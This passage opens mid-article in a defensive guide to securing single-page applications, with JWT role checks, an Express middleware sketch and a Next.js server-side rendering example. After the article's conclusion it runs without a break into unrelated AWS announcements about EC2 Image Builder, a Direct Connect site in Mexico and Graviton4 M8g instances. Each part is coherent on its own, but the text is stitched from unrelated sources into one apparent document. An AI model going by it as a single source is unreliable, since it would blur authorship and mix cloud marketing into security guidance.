API requests should be logged and monitored to identify if unauthorized users are attempting to or successfully accessing protected data. Additionally, it is advisable to conduct periodic penetration tests of web applications and APIs throughout their lifetime to identify any gaps in security. Penetration testing should uncover any APIs with partial or incomplete access control implementations, which would provide an opportunity to remediate flaws before they are abused by an adversary.
API Access Controls
Implementing robust API access controls is critical for securing SPAs. Access control mechanisms should use a JSON Web Token (JWT) or other unique, immutable session identifier to prevent users from modifying or forging session tokens. API endpoints should validate session tokens and enforce role-based access for every interaction. APIs are often configured to check if a user is authenticated, but they don’t comprehensively check user role access to an endpoint. In some cases, just one misconfigured endpoint is all it takes to compromise an application. For example, if all application endpoints are checking a user’s role except the admin endpoint that creates new users, then an attacker can create users at arbitrary role levels, including admin users.
An example of proper API access control is shown in Figure 1.
This diagram shows a user authenticating to the application, receiving a JWT, and rendering a page. The user interacts with the SPA and requests a page. The SPA identifies that the user is not authenticated so the JavaScript renders the login page. Once a user submits the login request, the SPA forwards it to the server through an API request. The API responds stating the user is authenticated and provides a JWT that can be used with subsequent requests. Once the SPA receives the response from the server, it stores the JWT and renders the dashboard that the user originally requested.
At the same time, the SPA requests the data necessary to render the page from the API. The API sends the data back to the application, and it is displayed to the user. Next, the user finds a way to bypass the client-side access controls and requests the main admin page in the application. The SPA makes the API requests to render the data for the admin page. The backend server checks the user’s role level, but since the user is not an admin user, the server returns a 403 error stating that the user is not allowed to access the data.
The example in Figure 1 shows how API access controls prevent a user from accessing API data. As stated in the example, the user was able to access the page in the SPA; however, due to the API access controls, they are not able to access the data necessary to fully render the page. For APIs developed in C# or Java, frameworks often provide annotations to simplify implementing access controls.
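For Node.js backends, an equivalent per-endpoint check can be written as middleware. The sketch below uses Express and jsonwebtoken; the route, role names, and secret handling are illustrative assumptions.

const express = require('express');
const jwt = require('jsonwebtoken');

const app = express();
app.use(express.json());

// Validate the session token on every request and attach the user claims.
function authenticate(req, res, next) {
  const token = (req.headers.authorization || '').replace('Bearer ', '');
  try {
    req.user = jwt.verify(token, process.env.JWT_SECRET);
    next();
  } catch (err) {
    res.status(401).json({ error: 'Invalid or missing token' });
  }
}

// Enforce role-based access for a specific endpoint.
function requireRole(role) {
  return (req, res, next) => {
    if (req.user && req.user.role === role) return next();
    res.status(403).json({ error: 'Forbidden' });
  };
}

// Even "admin-only" endpoints such as user creation get an explicit role check.
app.post('/api/users', authenticate, requireRole('admin'), (req, res) => {
  // ...create the user server-side...
  res.status(201).json({ created: true });
});

app.listen(3000);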
Server-Side Rendering
Aside from API access controls, another way to mitigate this issue is by using a JavaScript framework that has server-side rendering capabilities, such as SvelteKit, Next.js, Nuxt.js, or Gatsby. Server-side rendering is a combination of the MVC and SPA architectures. Instead of delivering all source content at once, the server renders the requested SPA page and sends only the finalized output to the user. The client browser is no longer in charge of routing, rendering, or access controls. The server can enforce access control rules before rendering the HTML, ensuring only authorized users see specific components or data.
An example of server-side rendering is shown in Figure 2.
This diagram shows a user accessing a server-side rendered application. After requesting an authenticated page in the application, the server checks if the user is authenticated and authorized to view the page. Since the user is not yet authenticated, the application renders the login page and displays that page to the user. The user then authenticates, and the server builds out the session, sets necessary cookies or tokens, and then redirects the user to the application dashboard. Upon being redirected, the user makes a request, the server checks the authentication state, and since the user has permissions to access the page, it fetches the necessary data and renders the dashboard with the data.
Next, the user identifies an admin page URL and attempts to access it. In this instance, the application checks the authentication state and the user’s role. Since the user does not have the admin role, they are not allowed to view the page and the server responds with either a 403 Forbidden or a redirection to an error page.
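A minimal sketch of this flow in a server-side rendered framework such as Next.js might look like the following; the session-lookup and data-fetching helpers are hypothetical placeholders for your own authentication and data layer.

// pages/admin.js: rendered on the server, so unauthorized users never
// receive the admin markup or data.
import { getUserFromSession, fetchAdminData } from '../lib/auth'; // hypothetical helpers

export async function getServerSideProps({ req }) {
  const user = await getUserFromSession(req);

  if (!user) {
    // Not authenticated: send the user to the login page instead.
    return { redirect: { destination: '/login', permanent: false } };
  }
  if (user.role !== 'admin') {
    // Authenticated but not authorized: respond without the admin page.
    return { notFound: true };
  }

  const data = await fetchAdminData(user);
  return { props: { data } };
}

export default function AdminPage({ data }) {
  return <pre>{JSON.stringify(data, null, 2)}</pre>;
}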
A Final Word
In conclusion, SPAs offer a dynamic and engaging user experience, but they also introduce unique security challenges when implemented with client-side rendering. By understanding the vulnerabilities inherent in SPAs, such as routing manipulation, hidden element exposure, and JavaScript debugging, developers can take proactive steps to mitigate risks. Implementing robust server-side access controls, API security measures, and server-side rendering are excellent ways to safeguard SPAs against unauthorized access and data breaches. Regular penetration testing and security assessments can further strengthen the overall security posture of SPAs by identifying any security gaps present in the application and allowing developers to remediate them before they are exploited. By prioritizing security best practices, developers can ensure that SPAs deliver both a seamless user experience and a secure environment for sensitive data.
Amazon EC2 Image Builder now supports direct conversion of Microsoft Windows ISO files to Amazon Machine Images (AMIs), streamlining the process of using your own Windows AMIs. This also simplifies the process of leveraging your existing Windows licenses (BYOL) with Amazon WorkSpaces.
The existing process for converting Windows ISO files into AMIs involves time-consuming manual steps and familiarity with multiple tools, increasing operational overhead. EC2 Image Builder now enables you to seamlessly import your Windows ISO files. This enhancement simplifies the workflow for Windows 11 ISO to AMI conversion and reduces time and complexity in creating custom Windows AMIs. These AMIs can be used to launch EC2 instances and can be easily imported to Amazon WorkSpaces.
This capability is available in all commercial AWS Regions. You can use this functionality through the AWS CLI, SDKs, or Console. For more information on how to use this feature, please refer to the documentation.
Today, AWS announced the opening of a new AWS Direct Connect location within the Equinix MX1, Querétaro, Mexico data center near Mexico City. By connecting your network to AWS at the new location, you gain private, direct access to all public AWS Regions (except those in China), AWS GovCloud Regions, and AWS Local Zones. This site is the second AWS Direct Connect location within Mexico. The new Direct Connect location offers dedicated 10 Gbps and 100 Gbps connections with MACsec encryption available.
AWS also announced the addition of 10 Gbps and 100 Gbps MACsec services in the existing KIO Networks data center in Querétaro, Mexico.
The Direct Connect service enables you to establish a private, physical network connection between AWS and your data center, office, or colocation environment. These private connections can provide a more consistent network experience than those made over the public internet.
For more information on the over 145 Direct Connect locations worldwide, visit the locations section of the Direct Connect product detail pages. Or, visit our getting started page to learn more about how to purchase and deploy Direct Connect.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) M8g instances are available in AWS Europe (Stockholm) region. These instances are powered by AWS Graviton4 processors and deliver up to 30% better performance compared to AWS Graviton3-based instances. Amazon EC2 M8g instances are built for general-purpose workloads, such as application servers, microservices, gaming servers, midsize data stores, and caching fleets. These instances are built on the AWS Nitro System, which offloads CPU virtualization, storage, and networking functions to dedicated hardware and software to enhance the performance and security of your workloads.
AWS Graviton4-based Amazon EC2 instances deliver the best performance and energy efficiency for a broad range of workloads running on Amazon EC2. These instances offer larger instance sizes with up to 3x more vCPUs and memory compared to Graviton3-based Amazon M7g instances. AWS Graviton4 processors are up to 40% faster for databases, 30% faster for web applications, and 45% faster for large Java applications than AWS Graviton3 processors. M8g instances are available in 12 different instance sizes, including two bare metal sizes. They offer up to 50 Gbps enhanced networking bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS).